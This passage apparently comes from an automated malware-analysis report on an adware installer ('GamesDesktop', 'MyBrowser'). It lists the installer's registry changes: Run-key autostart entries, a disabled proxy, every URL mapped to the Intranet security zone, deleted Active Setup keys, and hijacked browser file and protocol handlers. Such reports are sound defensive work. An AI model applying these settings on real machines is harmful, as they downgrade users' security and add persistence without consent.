"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsf2B.tmp:1664 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Tutorials\updv]
"Version" = "15.09.24"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"HelpLink" = "http://re.gamesdesktop.com"
"Inno Setup: User" = "%CurrentUserName%"
"QuietUninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe /SILENT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"InstallDate" = "20150926"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\gmsd_re_005010096\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLInfoAbout" = "http://re.gamesdesktop.com"
[HKCU\Software\TutoTag]
"OnceInstalled" = "re"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Publisher" = "GAMESDESKTOP"
[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft]
"Tinstalls" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Language" = "re"
"DisplayName" = "GamesDesktop 092.005010096"
[HKCU\Software\Microsoft\Tinstalls]
"20150926" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Icon Group" = "GAMESDESKTOP"
[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010096]
"PathInstall" = "%Program Files%\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLUpdateInfo" = "http://re.gamesdesktop.com"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 9B E8 E5 13 2D AC 35 DC 20 79 FF C2 7D C7 56"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoModify" = "1"
"Inno Setup: Setup Version" = "5.5.6 (a)"
[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
"OnceInstalled2" = "re"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe"
The SpyTool deletes the following registry key(s):
[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
The process nsf2B.tmp:668 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 67 77 1D 69 55 15 F3 4F EB 74 3E 9B C6 A1 AB"
The process nswA.tmp:1336 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 25 AC E3 B3 8E D3 91 44 01 AF 24 C8 81 EA DD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process gmsd_re_005010096.exe:592 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 9E D1 6F C3 38 D0 AA EF DC 44 FC D5 D6 BE 31"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process nsr19.tmp:204 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 9D C6 47 86 6D FD 8C 5E F7 81 B2 D5 78 01 56"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsdF.tmp:1060 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 0C 8A 19 3A 70 AF 02 72 88 8F 32 A4 56 22 7F"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process fsd34.exe:1692 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 8D AA A4 34 80 73 81 87 53 A4 0B B8 84 02 18"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Perl\bin]
"perl.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-KUMK3.tmp]
"nsf2B.tmp"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"
"SHELL32.dll,-8964"
"SHELL32.dll,-9319"
"SHELL32.dll,-9217"
"SHELL32.dll,-9216"
The process nsw42.tmp:660 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 69 E7 D4 C3 47 4E AA 92 96 CB FB DC 43 10 3C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nsx46.tmp:2724 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C B7 30 EF 41 21 51 2A A9 96 F2 AE 4C 48 31 01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setup.exe:1356 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"
[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20150926"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"
[HKCR\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser,"
[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"
[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"
[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
